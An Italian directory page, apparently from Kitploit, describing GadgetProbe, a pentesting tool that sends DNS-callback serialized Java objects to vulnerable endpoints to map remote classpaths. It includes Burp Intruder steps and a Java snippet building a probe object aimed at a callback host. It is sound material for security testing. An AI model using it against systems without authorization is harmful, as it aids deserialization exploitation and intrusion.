Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
GadgetProbe — Sonda gli endpoint che consumano oggetti serializzati Java per identificare classi, librerie e versioni delle librerie nei classpath Java remoti. | Kitploit
Strumenti/GitHubGitHub/bishopfox/gadgetprobe
RicognizioneGenerazione di PayloadAnalisi delle VulnerabilitàSfruttamento di Applicazioni WebPenetration Testing
GitHubbishopfox/gadgetprobe

GadgetProbe

Sonda gli endpoint che consumano oggetti serializzati Java per identificare classi, librerie e versioni delle librerie nei classpath Java remoti.

Vedi Repository
620975 anni faRevisionato da Kitploit

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi
Sito web

License Python version

Descrizione

Hai appena trovato un bug di deserializzazione Java, hai eseguito tutti i tuoi payload ysoserial e... non hai ottenuto nulla. E adesso? Come puoi fare debug o costruire una catena di gadget se sei completamente cieco?

Ecco GadgetProbe, uno strumento che fa luce sui classpath remoti e aumenta la gravità del bug per tutti!

GadgetProbe prende una wordlist di classi Java, genera oggetti serializzati di callback DNS e riporta cosa si nasconde nel classpath remoto.

Utilizzo dell'estensione Burp

L'estensione Burp si integra automaticamente con Burp Collaborator per gestire i callback DNS. L'estensione include anche firme e un analizzatore per identificare le versioni delle librerie delle fonti più comuni per i gadget.

Scarica la release oppure segui le istruzioni di build qui sotto.

Dopo aver caricato l'estensione Burp:

  1. Invia la richiesta vulnerabile a Intruder, evidenziando il parametro vulnerabile.

gif

2. Aggiungi un elenco di classi Java (vedi le wordlist incluse)

gif

3. Aggiungi il payload processor GadgetProbe e qualsiasi altro processor richiesto nella tua catena (ad es. codifica Base64).

gif

4. Esegui l'attacco Intruder e osserva i risultati tornare nella scheda GadgetProbe di Burp.

gif

Utilizzo della libreria Java GadgetProbe

GadgetProbe può essere utilizzato anche come libreria Java o CLI per attacchi specializzati.

root@kitploit:~
import com.bishopfox.gadgetprobe.GadgetProbe
...
// Call the GadgetProbe constructor with your authoritative nameserver (or use Burp collaborator).
GadgetProbe gp = new GadgetProbe("dnscallback.burpcollaborator.net");
// The crafted object "obj" is now ready to be sent using any custom implementation :)
Object obj = gp.getObject("org.apache.commons.collections.functors.invokertransformer");

Compilazione dal sorgente

root@kitploit:~
# Build JAR (run first)
./gradlew shadowJar

# Build wordlists
./generate_wordlists.sh

Come funziona

Vedi il mio articolo sul blog di Bishop Fox.

Autore

Twitter: @theBumbleSec

GitHub: the-bumble

Scarica lo strumento